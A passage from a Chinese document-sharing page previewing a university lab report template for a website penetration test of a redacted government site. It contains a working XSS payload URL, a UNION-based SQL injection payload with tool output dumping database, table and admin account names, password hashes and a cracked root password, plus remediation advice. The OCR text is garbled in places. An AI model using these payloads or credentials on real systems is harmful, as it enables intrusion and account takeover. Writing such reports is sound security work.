欢迎来到冰豆网! | 帮助中心 分享价值,成长自我!
冰豆网
全部分类
  • IT计算机>
  • 经管营销>
  • 医药卫生>
  • 自然科学>
  • 农林牧渔>
  • 人文社科>
  • 工程科技>
  • PPT模板>
  • 求职职场>
  • 解决方案>
  • 总结汇报>
  • 党团工作>
  • ImageVerifierCode 换一换
    首页 冰豆网 > 资源分类 > DOCX文档下载
    分享到微信 分享到微博 分享到QQ空间

    网站渗透测试报告模板.docx

    • 资源ID:6466162       资源大小:225.20KB        全文页数:8页
    • 资源格式: DOCX        下载积分:12金币
    快捷下载 游客一键下载
    账号登录下载
    微信登录下载
    三方登录下载: 微信开放平台登录 QQ登录
    二维码
    微信扫一扫登录
    下载资源需要12金币
    邮箱/手机:
    温馨提示:
    快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。
    如填写123,账号就是123,密码也是123。
    支付方式: 支付宝    微信支付   
    验证码:   换一换

    加入VIP,免费下载
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    网站渗透测试报告模板.docx

    1、网站渗透测试报告模板电子信息学院渗透测试课程实验报告实验名称: 实验时间: 学生姓名: 学生学号: 第1章概述 31.1测试目的 312测试范围 31.3数据来源 3第2章详细测试结果 42.1.测试工具 42.2.测试步骤 42.2.1.预扫描 42.2.2.工具扫描 42.2.3.人工检测 52.2.4.其他 52.3.测试结果 52.3.1.跨站脚本漏洞 62.3.2.SQL 盲注 72.3.2.管理后台 102.4.实验总结 11第1章概述1.1 .测试目的通过实施针对性的渗透测试,发现 XXXX网站系统的安全漏洞,保障XXX业务系统安全运行。12测试范围根据事先交流,本次测试的范围详

    2、细如下:系统名称XXX网站测试域名www.XX.gov.c n测试时间2014 年 10 月 16 日-2014 年 10 月 17 日说 明本次渗透测试过程中使用的源IP可能为:合肥1.3数据来源通过漏洞扫描和手动分析获取相关数据第2章详细测试结果2.1.测试工具根据测试的范围,本次渗透测试可能用到的相关工具列表如下:检测工具用途和说明WVSWVS(Web Vulnerability Scanner是一个自动化的 Web 应用 程序安全测试工具,它可以通过检查 SQL注入攻击漏洞、 跨站脚本攻击漏洞等来审核Web应用程序。NmapLinux,FreeBSD,UNIX,Windows 下的网络

    3、扫描和嗅探工具包。Burpsuite网络抓包工具,对网络的数据包传输进行抓取。浏览器插件对工具扫描结果进行人工检测,来判定冋题是否真实存在, 具体方法依据实际情况而定。其他系统本身具备的相关命令,或者根据实际情况米用的其他 工具。2.2测试步骤2.2.1.预扫描通过端口扫描或主机查看,确定主机所开放的服务。来检查是否有非正常的服务程序在运行。2.2.2.工具扫描主要通过Nessus进行主机扫描,通过 WVS进行 WEB扫描。通过Nmap进 行端口扫描,得出扫描结果。三个结果进行对比分析223.人工检测对以上扫描结果进行手动验证,判断扫描结果中的问题是否真实存在。2.2.4 .其他根据现场具体情

    4、况,通过双方确认后采取相应的解决方式。23测试结果本次渗透测试共发现2个类型的高风险漏洞,1个类型的低风险漏洞。这些 漏洞可以直接登陆 web管理后台管理员权限,同时可能引起内网渗透。获取到 的权限如下图所示:可以获取web管理后台管理员权限,如下步骤所示:通过SQL盲注漏洞获取管理员用户名和密码 hash值,并通过暴力破解工具 破解得到root用户的密码“ mylove1993.”Database; hnrllbTabT.e: admin2 entriesid | use rname | t ruename | passwo rd十 v * v v * * -s 9 v e v * v*b

    5、* v vwvww 晝+1| admin | 管理员 | b52e31 db4571463e1 Q0ec568502c7026 |2| root | | 42O65b7B77d39b8f6f713f7e6$ad8d7 |利用工具扫描得到管理后台url,使用root/mylove1993.登陆后台如图:FMHLtTsm -. 9iW-HK-3.JUfifftotmn 札椅- -subttt w菌帕豪购(ni!c 5 su*BVMB 231.跨站脚本漏洞风险等级:高漏洞描述:攻击者可通过该漏洞构造特定带有恶意 Javascript代码的URL并诱使浏览者点击,导致浏览者执行恶意代码。漏洞位置:ht

    6、tp:/www.XXX news.php?kd=&page=324变量:pagehttp:/www.XXX:80/red/latest_news.php变量:kdhttp:/www.XXX.gov.c n: 80/red/search.php变量:kdhttp:/www.XXX:80/red/sqmz2_do.php变量:num、psd漏洞验证:以其中一个XSS漏洞利用示范为例,在浏览器中输入: http:/www.XXX news.php?kd=&page=324%27%22%28%29%2 6%25%3C/spa n%3E%3CScRiPt%20%3Eprompt%28985315%29%

    7、3C/ScRiPt%3E% 3Cspa n%3E结果如图:i修复建议:对传入的参数进行有效性检测,应限制其只允许提交开发设定范围之内的数 据内容。要解决跨站脚本漏洞,应对输入内容进行检查过滤,对输出内容的特定 字符转义后输出,可采取以下方式:在服务器端对所有的输入进行过滤,限制敏感字符的输入。对输出进行转义,尤其是 ()& #这些符号。和可以转义为<和>。(和)可以转义为(和)。#和&可以转义为#和&。2.3.2.SQL 盲注风险等级:高 漏洞描述:系统中测试页面中存在SQL注入漏洞,攻击者可通过该漏洞查看、修改或删 除数据库条目和表以获取敏感信息。漏洞位置:

    8、http:/www.XXX.gov.cm80/new/sqmz2_do.php? num=2&psd=1 &Submit3=%bf%aa%ca%bc%b2%e9%d1%af变量:num漏洞验证:如下图所示,参数num存在UNION query类型的盲注:Pldce: 657Pa rameter: nuntTyp UMION quer jTitle: MySQL UNION query NULL) - g columnsPayload: nuin=5 UNION ALL SELECT MULL, NULL, CONCAT( 0171 75767071,0x4d779696B79 52584d70

    9、, 0x7163786371). NULL, NULL, MULL NULL, NULL MULL*眸SSubnixA施琲日毗b吐亡 惋-2站pq验n躺f14: 18: 17)(14: 18: 21INFD testlng MySQL INFO confirming Hy14r 18: 23 I INFO zhQ oack and DBMS Is MySQLweb server operating s/sten: Windows 2008 R2 or 7 礎b application technolcgy: Mlcrosatt I IS 7. 5, ASP. KE7 b欽 kYrid DBMS

    10、:叽m 乩 D. 0利用工具列出数据库名web server operating systofn: VVindciws 200S R2 or 7 web application technoloqy: Mic rosoft IIS 7. 5F ASP. NET back- end DBMS: MySQL S14;19; 11 INFO fetching dstabase namesavailable databases 2:* hnrllb* informatLon_schetna利用工具列出数据库hnrllb中的表名Datab曰se: hn rllb 12 tables+- - +| adm

    11、i.n| base class com_ledger menzhen| message per_ account | pe r_ ybzh photo tempypxxI心 I利用工具列出表admin中的列名Database: hnrltbTable; admin6 columns+- +| Column1 Type1 41 卜1 id |1 泣.ip | lasr_time passwo rd| t ruename | username4- 41 int( 5)| varchar( 20)| varchar 20) va rcharf 100)| varchar( 20)| /archar(

    12、 20)111111 d111 1 卜禾U用工具列出表 admin中id、user name true name和 password字段内容Dat abase; hn rllb Table: admin 2 ent riesid | use rname | t ruename | passwo rd+ -+ -+1admin Slim | b52e31db4571463s1 e0ec568502c7026 |2root | 42O6eSb7877d39b8f6f713f7e69ad8d7 |整改建议:过滤(select update or and )等特殊符号或者使用 preparestate

    13、ment 函数,直接删除该测试页面,或部署 web应用防护设备232.管理后台风险等级:低漏洞描述:攻击者可通过工具或者人工猜解,获取管理后台 url地址漏洞位置:http:/www.XXX.gov.c n/kan etwork/adminogin/logi n.php漏洞验证:在浏览器中输入 http:/www.XXX.gov.c n/kan etwork/adminogin/logi n.php结果如图:整改建议:修改管理后台url24实验总结通过本次渗透测试发现新网站系统存在的薄弱环节较多, 后续完全修复工作量较大:1.应用系统在正式部署上线前应在内网先进行安全测试,通过安全测试后 再放至公网;2 应用系统在开发过程中,应考虑网站应具备的安全功能需求,如:登录 框的验证码机制、口令的复杂度限制、口令的加密传输、后台管理页面限定 IP访问及上传功能安全机制等方面;3.建立统一、切实可用的的基础环境规范并落实,如:中间件的安装部署 基线、操作系统的安装部署基线等;4.部署网站防篡改及网页防火墙系统,保护DMZ区域内的所有WEB网站。


    注意事项

    本文(网站渗透测试报告模板.docx)为本站会员主动上传,冰豆网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰豆网(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

    copyright@ 2008-2022 冰点文档网站版权所有

    经营许可证编号:鄂ICP备2022015515号-1

    收起
    展开